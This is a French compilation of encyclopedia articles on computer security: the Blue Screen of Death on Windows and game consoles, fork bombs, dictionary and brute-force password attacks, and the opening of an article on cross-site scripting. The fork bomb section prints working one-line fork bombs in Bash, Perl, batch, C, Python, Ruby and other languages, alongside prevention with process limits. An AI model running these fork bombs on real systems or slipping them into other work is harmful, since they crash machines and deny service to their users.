Windows peut être réglé pour envoyer les informations Écran bleu de la mort sous Windows 2000. de débogage au travers d’un port COM vers un noyau débogueur séparé. Un débogueur est nécessaire pour tracer la pile, car la lecture à l’écran est limitée et peut être erronée, masquant ainsi la véritable cause de l’erreur. En 2003, des internautes de TweakXP.com [3] ont découvert un moyen de provoquer manuellement un écran bleu. Il consiste à ajouter une valeur à la base de registres de Windows. Une fois cela effectué, un BSoD apparaît lorsque l’utilisateur presse la touche « Arrêt défil. » deux fois tout en maintenant la touche Ctrl droite enfoncée[4].

Windows 8

Avec l'arrivée de Windows 8, l'écran bleu a été remanié. Il est maintenant plus esthétique et, surtout, plus concis, ne donnant que les informations nécessaires à l'utilisateur, à savoir : •• Ce qu'il s'est passé •• Le code de l'erreur On remarque également la disparition complète du code d'erreur au format hexadécimal.

Affichage

Par défaut, l’affichage est blanc (couleur CGA 0x0F ; Ecran bleu de la mort sous Windows 8 couleur HTML #FFFFFF) sur fond bleu (couleur EGA 0x01 ; couleur HTML #0000AA), avec les informations concernant les valeurs actuelles de la mémoire et celles des registres. Démontrant un réel sens de l’humour, Microsoft a ajouté un utilitaire[réf. souhaitée] permettant à l’utilisateur de changer le réglage du contrôle des couleurs du BSoD dans le fichier system.ini parmi les seize couleurs EGA disponibles.

Windows 95, 98 et Me utilisent le mode texte 80×25. La police est celle utilisée dans le mode MS-DOS natif. Le BSoD de Windows NT utilise le mode texte 80×50, avec une définition d’écran de 720 × 400. L’écran bleu de Windows XP utilise la police Lucida Console sur un affichage en 640 × 480. Écran bleu de la mort 77

Exemples

Windows XP Le tableau suivant est la simulation d’un BSoD de Windows XP, aussi, il se peut que certaines données soient différentes : A problem has been detected and Windows has been shut down to prevent damage to your computer. PFN_LIST_CORRUPT If this is the first time you've seen this Stop error screen, restart your computer. If this screen appears again, follow these steps: Check to make sure any new hardware or software is properly installed. If this is a new installation, ask your hardware or software manufacturer for any Windows updates you might need. If problems continue, disable or remove any newly installed hardware or software. Disable BIOS memory options such as caching or shadowing. If you need to use Safe Mode to remove or disable components, restart your computer, press F8 to select Advanced Startup Options, and then select Safe Mode. Technical information: *** STOP: 0x0000008E(0x0000005, 0xBF80A39A, 0xAL76EEC48, 0x00000000) WIN32K.SYS.ADRESS BF80A39A BASE AT BF8000000,DATESTAMP 45F013F6 Beginning dump of physical memory Physical memory dump complete. Contact your system administrator or technical support group for further assistance.

Windows NT4/2000 Le BSoD sous Windows NT4/2000 ressemble à cela : *** STOP: 0x0000000A (0x00000000, 0x00000002, 0x00000000, 8038c510) IRQL_NOT_LESS_OR_EQUAL*** Address 8038c510 has base at 8038c000 - Ntfs.sys CPUID:AuthenticAMD irq1:1f SYSVER 0xf0000565 Dll Base DateStmp - Name Dll Base DateStmp - Name 80100000 336546bf - ntoskrnl.exe 80010000 33247f88 - hal.dll 80000100 334d3a53 - atapi.sys 80007000 33248043 - SCSIPORT.SYS 802ab000 33013e6b - epst.mpd 802b5000 336016a2 - Disk.sys 802b9000 336015af - CLASS2.SYS 8038c000 3356d637 - Ntfs.sys 802bd000 33d844be - Floppy.sys 803e4000 33d84553 - viaide.sys f9328000 31ec6c8d - Siwvid.sys f95c9000 31ec6c99 - Null.SYS f9468000 31ed868b - KSecDD.sys f95cb000 335e60cf - Beep.SYS f9348000 335bc82a - i8024prt.sys f95cb000 3373c39d - ctrl2cap.SYS f947c000 31ec6c94 - kbdclass.sys f9474000 3324806f - mouclass.sys f9370000 33248011 - VIDEOPORT.SYS fe9d7000 3370e7b9 - NDIS.SYS f9480000 31ec6c6d - vga.sys f93b0000 332480dd - Msfs.SYS f90f0000 332480d0 - Npfs.sys fe957000 3356da41 - ati.sys a0000000 335157ac - win32k.sys fe914000 334ea144 - ati.dll fe0c9000 335bd30e - Fastfat.SYS fe110000 31ec6c9b - Parport.SYS fe108000 31ec6c9b - Serial.sys f93b4000 31ec7c9d - ParVdm.SYS f9050000 332480ab - Parallel.sys Address dword dump Build [1314] - Name 801afc24 80149905 80149905 ff8e6b8c 80129c2c ff8e6b94 8025c000 - Ntfs.SYS 801afd24 80129c2c 80129c2c ff8e6b94 00000000 ff8e6b94 80100000 - ntoskrnl.exe 801afd34 801240f2 80124f02 ff8e6cf4 ff8e6d60 ff8e6c58 80100000 - ntoskrnl.exe 801afd54 80124a16 80124a16 ff8e6f60 ff8e6c3c 8015ac7e 80100000 - ntoskrnl.exe 801afd64 8015ac7e 8015ac7e ff8e6cf4 ff8e6f60 ff8e6c58 80100000 - ntoskrnl.exe 801afc70 80129bda 80129bda 00000000 80088000 80106f60 80100000 - ntoskrnl.exe Restart and set the recovery options in the system control panel or the /CRASHDEBUG system start option. If this message reappears, contact your system administrator or technical support group. Écran bleu de la mort 78

Windows 95/98/Me Le panneau suivant simule un écran bleu de la mort sous Windows 95/98/Me. Il préconise l’emploi de la combinaison de touches Ctrl-Alt-Del pour redémarrer l’ordinateur. Windows A fatal exception 0E has occurred at 0157:BF7FF831. The current application will be terminated. * Press any key to terminate the current application. * Press CTRL+ALT+DEL to restart your computer. You will lose all unsaved information in all applications. Press any key to continue

Écrans bleus dans l'industrie informatique Les systèmes embarqués tournant sous Microsoft Windows ont également connu leur écran bleu. Les exemples typiques sont les téléphones publics par Internet, les automates et autres bornes d’information ou panneaux d’affichage. Certains BSoD ont été causés par WinNuke, qui a été un moyen très populaire pour les script kiddies d’attaquer d’autres utilisateurs et déconnecter leur ordinateur de leur accès à l’Internet et ainsi afficher un écran bleu sur leur machine. La faille de sécurité exploitée par WinNuke n’est pas corrigée sur Windows 95 car Microsoft a cessé de maintenir ce système d’exploitation. Un correctif est disponible pour les autres versions. Une des causes fréquentes de l’écran bleu est le dysfonctionnement du processeur, mal refroidi par l’accumulation de poussière dans les ailettes du radiateur. Hors tension, il suffit de retirer les quatre vis du ventilateur et de nettoyer les ailettes avec un aspirateur ou d’évacuer la poussière en soufflant avec une bombe d’air comprimé.

Base de connaissance des écrans bleus de la mort Le système d’exploitation GNU/Linux, alternative à Windows, a également ses propres erreurs fatales, tel le Kernel panic, bien que moins emblématiques que le BSoD. Cependant, certains utilisateurs ont créé un économiseur d’écran simulant différents écrans bleus de la mort, pour se moquer de Windows. On trouve cet économiseur d’écran dans différentes distributions parmi les plus connues. Un écran de veille similaire [5] existe aussi pour Windows. Microsoft a également inclus une référence aux BSoD sous la forme d’un easter egg (œuf de Pâques, petit clin d’œil caché dans un programme) dans certaines versions de son navigateur Internet Explorer. Il suffit de saisir « about:mozilla » dans la barre de navigation pour obtenir une page bleue en guise de réponse. Cette commande est le moyen standard pour obtenir Le Livre de Mozilla, un autre easter egg disponible dans les navigateurs de la famille Netscape depuis la version 1.1. Sur le système d’exploitation Mac OSX Leopard, les PC connectés au réseau sont représentés par un vieil écran cathodique gris affichant un BSOD…

La famille s'agrandit Depuis 2007, les écrans bleus de la mort ont cédé en partie leur place aux RSoD signifiant « Red Screen of Death », ou « Écran Rouge de la Mort » pour le successeur de Windows XP, Windows Vista (dans certaines versions uniquement). Le RSoD est uniquement réservé aux erreurs critiques et le BSoD continue de vivre, mais pour des erreurs nécessitant « seulement » le redémarrage. Des rumeurs disent que rouge rime avec négatif, et bien sûr une erreur n’est pas positive. Il peut aussi y avoir des écrans verts au démarrage, mais dans ce cas, l’OS peut continuer. Écran bleu de la mort 79

Écrans de la mort sur les consoles

PlayStation 2 La PlayStation 2 (PS2) a aussi un écran de la mort, mais cette fois-ci avec des colonnes rouges (au démarrage, ce sont des colonnes bleues). Le son ressemble beaucoup au son de démarrage de la console. Ce problème survient quand un format de disque n’est pas celui de PlayStation 2 (ou PlayStation 1). Une phrase est alors inscrite au milieu de l’écran, en gris. Même si vous allez dans le navigateur et que vous insérez le disque, l’écran de la mort se met automatiquement. Si un disque est rayé ou endommagé, et si vous allez dans le navigateur, l’écran se noircit et marque en gris : « Erreur lors de la lecture du disque ».

PSP La PSP a également un écran appelé Blue Screen Of the Death, on le voit souvent au démarrage de la PSP après une modification de la mémoire flash de celle-ci (installation d’un firmware non officiel par exemple). Il inscrit sur un fond de dégradé bleu dans de nombreuses langues : « Les informations de configuration sont endommagées. Appuyez sur la touche O pour rétablir et réparer les paramètres par défaut ». Cet écran sur PSP est la plupart du temps bénin, il suffit d’appuyer sur la touche O, de reparamétrer sa console. Cependant, certaines fois, la PSP se bloque sur cet écran et la touche O ne résout rien. Le problème est alors beaucoup plus sérieux. La console est la plupart du temps inutilisable par la suite pour un utilisateur ne sachant pas contourner le problème.

iPod Touch et iPhone Sur les iPod Touch et les iPhone, il est possible de voir un écran de la mort si l’utilisateur a jailbreaké son appareil et qu’il a fait une modification du système via le WinterBoard pour les versions 2.x ou 3.x. Cela peut aussi arriver lors d’une surcharge du processeur de l’iPod Touch ou de l’iPhone. L’appareil est alors en mode sans échec et une fenêtre ayant comme titre Exit Safe Mode, créée par Saurik, propose à l’utilisateur de respringer (relancer) son appareil ou de le rebooter (redémarrer) pour quitter ce mode. L’utilisateur peut, via ce mode, corriger les éventuelles erreurs.

Game Boy Advance Si une cartouche est enlevée de la Game Boy Advance pendant qu’elle fonctionne encore, l’écran affiche un écran de la mort sans texte ou, plus communément, continuera à afficher une image « gelée » du jeu comme il était au moment exact avant le gel et continuera à jouer la note sonore qu’il effectuait à ce moment. Remettre la cartouche ne stoppera pas le problème. Pour le résoudre, il faut éteindre la console, remettre la cartouche et la rallumer. La plupart des jeux redémarrent au dernier point de sauvegarde. Le même problème apparaît avec un jeu GBA sur la Nintendo DS.

Wii La Wii a un écran dit écran vert de la mort qui, normalement, n’apparaît pas durant un usage normal, mais qui peut apparaître après avoir lancé un Homebrew ou tout autre programme non officiel, ou bleu dans le cas d'un bug de jeu. La Wii peut aussi présenter un écran noir de la mort avec un texte qui explique qu'une erreur est survenue et qu'il suffit de retirer le disque de jeu et d'éteindre la console, puis de la rallumer.

GameCube La GameCube a un écran dit écran vert de la mort qui, n’apparaît pas durant un usage normal, mais qui peut se présenter lorsque qu’un freeloader est lancé et le bouton reset enfoncé. Écran bleu de la mort 80

Nintendo DS La couleur dudit écran de la mort dépend de la version du firmware (micrologiciel) de la console à ce moment-là. La version 6, celle de la plupart des machines, affiche un écran bleu de la mort. La version 5, celle de la DS Lite, affiche une couleur magenta. Couleurs possibles : •• Bleu (Version 6) •• Magenta (Version 5) •• Vert (Version 3) •• Jaune (Version 4) Mais dans certains cas spéciaux de NDS lite achetées à l’étranger, l’écran freeze, tout simplement… Cependant si l'on retire la carte durant le mode jeu, l'ecran se gèle ou affiche un ecran noir de la mort sur les deux écrans disant que la carte a été retirée.

Cas spécifiques de jeux • Animal Crossing : Wild World : pendant le jeu, si la connexion sans-fil est perturbée, un écran bleu clair apparaîtra comprenant le personnage Mr Ressetti qui à l’air triste avec un texte disant que le jeu a été interrompu et que toutes les progressions non sauvegardées seront perdues. • Pokemon Diamant et Perle : les données corrompues résultent d’une erreur de type blue screen. • Pokémon Or HeartGold et Argent SoulSilver: un message de fond bleu avec un affichage lent indique que "le fichier de sauvegarde est corrompu. Le fichier précédent va être chargé." Dans les cas les plus graves, la partie est totalement effacée. Ceci ne peut être dû qu'à l'éteinte alors que le jeu est en train de sauvegarder la partie. • Mario Kart DS : En mode multijoueur, les deux écrans deviennent noir et un court texte apparaît indiquant que la partie a été interrompue et qu'il suffit d'appuyer sur le bouton A pour éteindre la console, si une des console s'est éteinte ou si la cartouche est retirée. • PictoChat : Certaines DS affichent un écran vert de la mort quand une carte DS ou une cartouche GBA est enlevée dans le menu PictoChat. • PictoChat : La Nintendo DS donne un écran de la mort d’une seule couleur et sans texte sur les deux écrans quand l’utilisateur retire la carte DS ou la cartouche GBA en étant sur la sélection menu du PictoChat.

Xbox 360 La Xbox 360 donnera un BSoD (Black screen of death, cette fois-ci) avec une explication en plusieurs langues disant de contacter le service Xbox 360. En bas de l’écran se situe le code E 74, ce qui signifie un problème fatal du disque dur ; une lumière rouge clignote pour signifier l’erreur. On peut continuer à jouer si on enlève le disque dur mais il n’y aura aucune source de sauvegarde. Il existe également un RRoD, Red Ring of Death, qui signifie que la console est hors d’usage et qu’elle doit être renvoyée au service client, cela se traduit par l’allumage en rouge des diodes situées autour du bouton On/Off, d’où son nom. Écran bleu de la mort 81

PlayStation 3 Sur Playstation 3, on appelle YLOD (Yellow Light of Death) le signal annonçant une panne majeure et représenté par l’affichage successif de 3 couleurs dont le jaune sur la led lumineuse située à côté du bouton de démarrage. La led jaune ne se manifeste jamais en dehors de cette panne (souvent due à une surchauffe).

Dans la fiction •• Dans le jeu vidéo SWAT 4, de nombreux ordinateurs sont aperçus affichant un BSoD. • Dans la version française du jeu vidéo Unreal Tournament III, les Robots de la Liandri (des hommes-machines) s’exclament avec fanatisme juste avant de mourir « Je vois l’Écran Bleu » conférant ainsi avec humour une fonction religieuse au phénomène. • Dans le jeu Portal 2, avant chaque salle, le personnage arrive dans une zone aux murs recouverts d'écrans, lesquels diffusent une vidéo explicative. Pour symboliser le délabrement avancé du complexe, au bout d'un certain chapitre, ces écrans n'affichent qu'un BSoD parodique. • Dans Half-Life, un "barney" (garde) essaye de réparer son ordinateur qui a planté et où l'on peut voir un BSoD.

Sous Mac OS X Sous le système d’exploitation Mac OS X, on parle de WOD, Wheel of Death ou encore SBOD, 'Spinning Beachball Of Death', en français ballon de plage de la mort, ce ballon de plage rotatif étant le pointeur indiquant qu'une application est en cours de travail. (Sa non-disparition pouvant être synonyme de plantage du programme.) On doit noter que, dans un tel système UNIX, le crash d'une application ne provoque pour ainsi dire jamais celui du système, comme ce peut être le cas sous Windows. En revanche, la panique du noyau, si elle est assez rare, demande le redémarrage de la machine.

Sony Ericsson Sur l’OS propriétaire de Sony Ericsson, lorsque le téléphone bloque significativement à un moment donné, et qu’il n’est plus en mesure de répondre, un écran blanc de la mort apparaît, le téléphone semble s’éteindre, mais revient comme lors d’un allumage.

Références

[1] http:/ / fr. wikipedia. org/ w/ index. php?title=%C3%89cran_bleu_de_la_mort& action=edit

[2] (http:/ / www. microsoft. com/ technet/ security/ bulletin/ ms00-017. mspx).

[3] http:/ / www. tweakxp. com

[4] Recette du BSoD (http:/ / www. tweakxp. com/ article37502. aspx).

[5] http:/ / www. microsoft. com/ technet/ sysinternals/ Miscellaneous/ BlueScreen. mspx Fork bomb 82 Fork bomb

La fork bomb est une forme d'attaque par déni de service contre un système informatique utilisant la fonction fork. Elle est basée sur la supposition que le nombre de programmes et de processus pouvant être exécutés simultanément sur un ordinateur est limité. Une fork bomb fonctionne en créant un grand nombre de processus très rapidement afin de saturer l'espace disponible dans la liste des processus gardée par le système d'exploitation. Si la table des processus se met à saturer, aucun nouveau programme ne peut Schéma de la bombe logique : un processus est démarrer tant qu'aucun autre ne termine. Même si cela arrive, il est peu forké de manière récursive jusqu'à saturer les ressources et aboutir à un plantage ou un déni de probable qu'un programme utile démarre étant donné que les instances service de la bombe attendent chacune d'occuper cet emplacement libre.

Non seulement les fork bombs utilisent de la place dans la table des processus, mais elles utilisent chacune du temps processeur et de la mémoire. En conséquence, le système et les programmes tournant à ce moment-là ralentissent et deviennent même impossibles à utiliser. Les fork bomb peuvent être considérées comme un certain type de wabbit (un programme qui s'autoréplique sans utiliser de réseau).

Exemples En langage Perl :

fork while fork

Soit en le lançant dans un terminal : perl -e "fork while fork" &

En shell Bash :

:(){ :|:& };:

Explications : :() définit une fonction nommée :. { :|:& } est le corps de la fonction. Dans celui-ci, la fonction s'appelle elle-même (:), puis redirige la sortie à l'aide d'un pipe (|) sur l'entrée de la même fonction : et cache le processus en fond avec &. La fonction, ensuite appelée avec :, s'appelle récursivement à l'infini. En utilisant un fichier batch : Bien que la fonction « fork » qui ait donné son nom aux fork bombs soit une convention Posix, Microsoft Windows permet également d’en réaliser, sur le même principe : %0|%0

Ou également : :s start %0 goto :s

En langage C : Fork bomb 83

#include

int main(void) { while(1) { /* ici on peut ajouter un malloc pour utiliser plus de ressources */ fork(); } return 0; }

En Assembleur x86 :

entry start start: push 0x2 pop eax int 0x80 jmp start

En Python :

import os

while True: os.fork()

En VB6 :

Private Sub Main() Do Shell App.EXEName Loop End Sub

En Ruby :

loop { fork }

En HTML : En HTML, on peut faire ouvrir deux pages dans des cadres qui ouvrent récursivement les mêmes cadres, provoquant un déni de service. Cependant, avec les navigateurs créant un processus par onglet, on peut avoir une authentique fork bomb en html et JavaScript, à condition que le navigateur ne bloque ni les popups ni le javascript :

Difficulté de guérison Une fois la fork bomb activée avec succès dans un système, il peut devenir impossible de retrouver un fonctionnement normal sans redémarrer, étant donné que la seule solution à une fork bomb est de détruire toutes ses instances. Essayer d'utiliser un programme pour tuer les processus requiert la création d'un processus, ce qui peut être impossible s'il n'y a pas d'emplacement vide dans la table des processus, ou d'espace dans les structures mémoires.

Prévention La fork bomb fonctionne en créant autant de processus que possible. Ainsi, pour empêcher une fork bomb, il suffit simplement de limiter le nombre de processus pouvant être exécutés par un programme ou par un utilisateur. En permettant aux utilisateurs de non-confiance de lancer seulement un petit nombre de processus, le danger d'une fork bomb, intentionnelle ou non, est réduit. Toutefois, cela n'empêche pas un groupe d'utilisateurs de collaborer pour consommer les emplacements processus, à moins que la limite totale des processus soit plus grande que la somme des limites des processus individuelles.

Protection sous Unix Les systèmes de type Unix permettent de limiter le nombre de processus via la commande ulimit. Dans un noyau Linux, cette limite peut être indiquée via RLIMIT_NPROC. Si un processus appelle fork et que l'utilisateur possède déjà plus de RLIMIT_NPROC processus alors le fork échoue. Ici encore la limitation est propre à un utilisateur donné et ne permet pas de déjouer les attaques simultanées par plusieurs utilisateurs. Elle permet toutefois de limiter l'impact de forks accidentels, par exemple lors de la conception d'un logiciel ou d'un bogue dans une application.

• Portail de la sécurité informatique 85

2.4-Mot de passe

Attaque par dictionnaire

L'attaque par dictionnaire est une méthode utilisée en cryptanalyse pour trouver un mot de passe ou une clé. Elle consiste à tester une série de mots de passe potentiels, les uns à la suite des autres, en espérant que le mot de passe utilisé pour le chiffrement soit contenu dans le dictionnaire. Si ce n'est pas le cas, l'attaque échouera. Cette méthode repose sur le fait que de nombreuses personnes utilisent des mots de passe courants (par ex : un prénom, une couleur, le nom d'un animal…). C'est pour cette raison qu'il est toujours conseillé de ne pas utiliser de mot de passe comprenant un mot ou un nom (voir l'article Mot de passe pour connaitre les précautions d'usage lors du choix d'un mot de passe). L'attaque par dictionnaire est une méthode souvent utilisée en complément de l'attaque par force brute qui consiste à tester, de manière exhaustive, les différentes possibilités de mots de passe. Cette dernière est particulièrement efficace pour des mots de passe n'excédant pas 5 ou 6 caractères.

Contenu du dictionnaire et règles Outre le contenu habituel d'un dictionnaire qui renferme un ensemble de mots, le dictionnaire peut être rendu plus efficace en combinant les mots ou en y appliquant certaines règles, qui correspondent aux habitudes de choix des mots de passe actuels. Pour citer quelques exemples courant, pour chaque mot, on peut essayer de changer la casse de certaines lettres ou les remplacer par leurs équivalents en leet speak. Une autre astuce consiste à répéter deux fois le mot (par exemple « secretsecret »). On peut aussi générer des dictionnaires correspondant à l'ensemble des numéros de plaque, des numéros de sécurité sociale, des dates de naissance, etc. De tels dictionnaires permettent de casser assez facilement des mots de passe d'utilisateurs faisant appel à ces méthodes peu sûres pour renforcer leurs mots de passe.

Logiciels Le logiciel John the Ripper, le plus connu dans ce domaine, est fourni avec une liste de règles qui permettent d'étendre l'espace de recherche et explorer les failles classiques dans l'élaboration des mots de passe ou des clés par les utilisateurs. Il existe des dictionnaires qui contiennent plusieurs millions de mots et qui ne sont pas fournis avec le logiciel. Citons encore L0phtcrack et Cain & Abel qui fournissent des services similaires. Toutefois, ce type de logiciels n'est pas forcément utilisé dans un but malicieux. Ces outils peuvent être utiles pour les administrateurs qui veulent sécuriser les mots de passe et alerter les utilisateurs sur les risques encourus. Attaque par dictionnaire 86

Détection Il est possible de détecter les attaques de force brute en limitant la durée entre deux tentatives d’authentification ce qui augmente considérablement la durée de déchiffrage. Autre possibilité, le système des cartes à puces (exemple carte bancaires) ou les cartes SIM qui bloque le système au bout de 3 tentatives infructueuses ce qui rend impossible toute attaque par force brute.

Salage de mot de passe Dans les applications, les mots de passe sont souvent stockés sous forme de hash à partir desquels il est très difficile de retrouver le contenu du mot de passe. Certains dictionnaires utilisés pour les attaques comportent le résultat des signatures des mots de passe les plus communs. Une personne malveillante ayant accès aux résultats du hachage des mots de passe pourrait donc deviner le mot de passe originel. Dans ce cas on peut utiliser le "salage" du mot de passe. C'est-à-dire l'ajout d'une séquence de bit servant à modifier la séquence finale. Prenons par exemple le mot de passe ‘Wikipedia’, qui utilisé avec l’algorithme SHA-1 produit : ‘664add438097fbd4307f814de8e62a10f8905588’. Nous allons maintenant utiliser un salage du mot de passe en y ajoutant ‘salé’. En hachant « Wikipediasalé » nous obtenons le hashage : ‘1368819407812ca9ceb61fb07bf293193416159f’ rendant tout dictionnaire inutile. Une bonne pratique est de ne pas utiliser une clé de salage unique mais de la générer aléatoirement pour chaque enregistrement[1]. Même si la clé de salage est lisible il faudra pour chaque mot de passe régénérer un dictionnaire salé complet. On peut aussi intégrer une partie dynamique et une partie intégrée au code source de l’application pour une sécurité maximum. Les systèmes d’exploitation de type UNIX utilisent un système de mots de passe hachés salés.

Références

[1] Explication en anglais sur les raisons d'utiliser un salage aléatoire. (http:/ / stackoverflow. com/ questions/ 536584/

non-random-salt-for-password-hashes/ 536756#536756)

Articles connexes •• Cassage de mot de passe •• Attaque par force brute •• Authentification forte •• Fonction de hachage

Liens externes

Liste de Dictionnaires de mots courants sur AuthSecu.com (http:/ / www. authsecu. com/ dictionnaire/ dictionnaire. php)

• Portail de la cryptologie • Portail de la sécurité informatique Attaque par force brute 87 Attaque par force brute

L'attaque par force brute est une méthode utilisée en cryptanalyse pour trouver un mot de passe ou une clé. Il s'agit de tester, une à une, toutes les combinaisons possibles. Cette méthode de recherche exhaustive ne réussit que dans les cas où le mot de passe cherché est constitué de peu de caractères. Ces programmes tentent toutes les possibilités de mot de passe dans un ordre aléatoire afin de berner les logiciels de sécurité qui empêchent de tenter tous les mots de passe dans l'ordre.

Pour contrer cette méthode, il suffit simplement de choisir des mots de passe d'une grande longueur ou des clés suffisamment grandes. Ainsi, l'attaquant devra mettre beaucoup de temps pour trouver le bon mot de passe. Cette méthode est très sensible aux capacités de calcul des machines effectuant l'algorithme. Cette méthode est souvent combinée avec l'attaque par Deep Crack, circuit dédié à l'attaque par force brute de DES. dictionnaire et par table arc-en-ciel pour trouver le secret plus rapidement.

Explication mathématique

Si le mot de passe contient N caractères, indépendants (la présence d'un caractère ne va pas influencer un autre) et uniformément distribués (aucun caractère n'est privilégié), le nombre maximum d'essais nécessaires se monte alors à : • 26N si le mot de passe ne contient que des lettres de l'alphabet totalement en minuscules ou en majuscules ; • 52N si le mot de passe ne contient que des lettres de l'alphabet, avec un mélange de minuscules et de majuscules ; • 62N si le mot de passe mélange les majuscules et les minuscules ainsi que les chiffres. Il suffit en fait d'élever la taille de « l'alphabet » utilisé à la puissance N. Il s'agit ici d'une borne supérieure et en moyenne, il faut deux fois moins d'essais pour trouver le mot de passe (si celui-ci est aléatoire). En réalité, bien peu de mots de passe sont totalement aléatoires et le nombre d'essais est bien inférieur aux limites données ci-dessus (grâce à la possibilité d'une attaque par dictionnaire). Le tableau ci-dessous donne le nombre maximum d'essais nécessaires pour trouver des mots de passe de longueurs variables. Attaque par force brute 88

Type 3 caractères 6 caractères 9 caractères

lettres minuscules 17 576 308 915 776 5,4 × 1012

lettres minuscules et chiffres 46 656 2 176 782 336 1,0 × 1014

minuscules, majuscules et chiffres 238 328 5,6 × 1010 1,3 × 1016

Un ordinateur personnel est capable de tester plusieurs centaines de milliers voire quelques millions de mots de passe par seconde. Cela dépend de l'algorithme utilisé pour la protection mais on voit qu'un mot de passe de seulement 6 caractères, eux-mêmes provenant d'un ensemble de 62 symboles (minuscules ou majuscules accompagnés de chiffres), ne tiendrait pas très longtemps face à une telle attaque. Dans le cas des clés utilisées pour le chiffrement, la longueur est souvent donnée en bits. Dans ce cas, le nombre de possibilités (si la clé est aléatoire) à explorer est de l'ordre de 2N où N est la longueur de la clé en bits. Une clé de 128 bits représente déjà une limite impossible à atteindre avec la technologie actuelle et l'attaquant doit envisager d'autres solutions cryptanalytiques si celles-ci existent. Il faut cependant prendre en compte que la puissance du matériel informatique évolue sans-cesse (voir Loi de Moore) et un message indéchiffrable à un moment donné peut l'être par le même type d'attaque une dizaine d'années plus tard.

Limiter la recherche exhaustive Pour éviter des attaques par force brute, la meilleure solution est : •• d'allonger le mot de passe ou la clé si cela est possible ; •• utiliser la plus grande gamme de symboles possibles (minuscules, majuscules, ponctuations, chiffres); l'introduction de caractères nationaux (Â, ÿ...) rend plus difficile le travail des pirates (mais parfois aussi l'entrée de son mot de passe quand on se trouve à l'étranger) ; •• pour éviter d'avoir à faire face à une attaque par dictionnaire, faire en sorte que le mot de passe soit aléatoire ; •• et pour une sécurité optimum, empêcher de dépasser un nombre maximal d'essais en un temps ou pour une personne donnée. Dans les applications, on peut aussi introduire un temps d'attente entre l'introduction du mot de passe par l'utilisateur et son évaluation. L'éventuel attaquant devrait dans ce cas attendre plus longtemps pour pouvoir soumettre les mots de passe qu'il génère. Le système peut aussi introduire un temps d'attente après plusieurs essais infructueux, ceci dans le but de ralentir l'attaque. Les systèmes de mots de passe comme celui d'Unix utilisent une version modifiée du chiffrement DES. Chaque mot de passe est accompagné d'une composante aléatoire appelée sel dont le but est de modifier la structure interne de DES et éviter ainsi une recherche exhaustive en utilisant du matériel spécialement conçu pour DES. Deux brevets principaux existent à ce sujet : • Un des laboratoires Bell consistant à doubler le temps d'attente après chaque essai infructueux, pour le faire redescendre ensuite en vol plané après un certain temps sans attaques. • Un de la compagnie IBM consistant à répondre « Mot de passe invalide » après N essais infructueux en un temps T, y compris si le mot de passe est valide[1] : le pirate a alors toutes les chances de rayer de façon erronée le mot de passe valide en le considérant invalide. De plus, cette méthode empêche toute attaque visant à un déni de service pour l'utilisateur. En théorie et avec suffisamment de temps, l'attaquant peut toujours trouver le mot de passe, mais lorsque ce temps dépasse la décennie, il ne pourra pas en escompter un grand profit, et le mot de passe aura de toute façon changé. Il change même à chaque fois si l'on emploie le principe du masque jetable. Le problème est tout autre si l'attaquant récupère directement le fichier des hashs des mots de passe ; plus rien ne l'empêche alors de tester chez lui des mots de passe à la vitesse de son(es) ordinateur(s). C'est pourquoi dans tous les Attaque par force brute 89

UNIX modernes ces hashs sont généralement situés dans le fichier /etc/shadow, lisible uniquement par l'utilisateur root. Une compromission de cet utilisateur permet par conséquent de récupérer ce fichier, et ainsi de lancer une attaque par force brute sur son contenu.

Notes et références

[1] System and method of preventing unauthorized access to computer resources - Patent EP1209551 (http:/ / www. freepatentsonline. com/

EP1209551. html) 90

2.5-Site web

Cross-site scripting

Cet article ne cite pas suffisamment ses sources (septembre 2007). Si vous disposez d'ouvrages ou d'articles de référence ou si vous connaissez des sites web de qualité traitant du thème abordé ici, merci de compléter l'article en donnant les références utiles à sa vérifiabilité et en les liant à la section « Notes et références ». (Modifier l'article [1] )

Le cross-site scripting (abrégé XSS), est un type de faille de sécurité des sites web permettant d'injecter du contenu dans une page, permettant ainsi de provoquer des actions sur les navigateurs web visitant la page. Les possibilités des XSS sont très larges puisque l'attaquant peut utiliser tous les langages pris en charge par le navigateur (JavaScript, Java, Flash...) et de nouvelles possibilités sont régulièrement découvertes notamment avec l'arrivée de nouvelles technologies comme HTML5. Il est par exemple possible de rediriger vers un autre site pour du hameçonnage ou encore de voler la session en récupérant les cookies. Le Cross-Site Scripting est abrégé XSS pour ne pas être confondu avec le CSS (feuilles de style)[2], X étant une abréviation commune pour « cross » (croix) en anglais.

Définition Le terme cross-site scripting n'est pas une description très précise de ce type de vulnérabilité. Mark Slemko, pionnier du XSS, en disait : « Le problème n'est pas simplement le 'scripting', et il n'y a pas forcément quelque chose entre plusieurs sites. Alors pourquoi ce nom ? En fait, le nom a été donné quand le problème était moins bien compris, et c'est resté. Croyez-moi, nous avions des choses plus importantes à faire que de réfléchir à un meilleur nom. » — Mark Slemko, Cross Site Scripting Info [3], sur The Apache HTTP Server Project [4], février 2000 Le principe est d'injecter des données arbitraires dans un site web, par exemple en déposant un message dans un forum, mais aussi par des paramètres d'URL, etc. Si ces données arrivent telles quelles dans la page web transmise au navigateur (par les paramètres d'URL, un message posté, etc.) sans avoir été vérifiées, alors il existe une faille : on peut s'en servir pour faire exécuter du code malveillant en langage de script (du JavaScript le plus souvent) par le navigateur web qui consulte cette page. La détection de la présence d'une faille XSS peut se faire par exemple en entrant un script Javascript dans un champ de formulaire ou dans une URL :

Si une boîte de dialogue apparaît, on peut en conclure que l'application Web est sensible aux attaques de type XSS. Cross-site scripting 91

Les risques L'exploitation d'une faille de type XSS permettrait à un intrus de réaliser les opérations suivantes : • Redirection (parfois de manière transparente) de l'utilisateur (souvent dans un but de hameçonnage) • Vol d'informations, par exemple sessions et cookies. • Actions sur le site faillible, à l'insu de la victime et sous son identité (envoi de messages, suppression de données, etc.) • Rendre la lecture d'une page difficile (boucle infinie d'alertes par exemple).

Types de failles XSS Il n'existe pas de classification standardisée des failles de cross-site scripting, mais l'on peut facilement distinguer 2 types principaux de XSS : les non-persistants et les persistants. Il est aussi possible de diviser ces deux types en deux groupes : les XSS traditionnels (causés par une vulnérabilité côté-serveur) et les XSS basés sur le DOM (dus à une vulnérabilité côté-client)

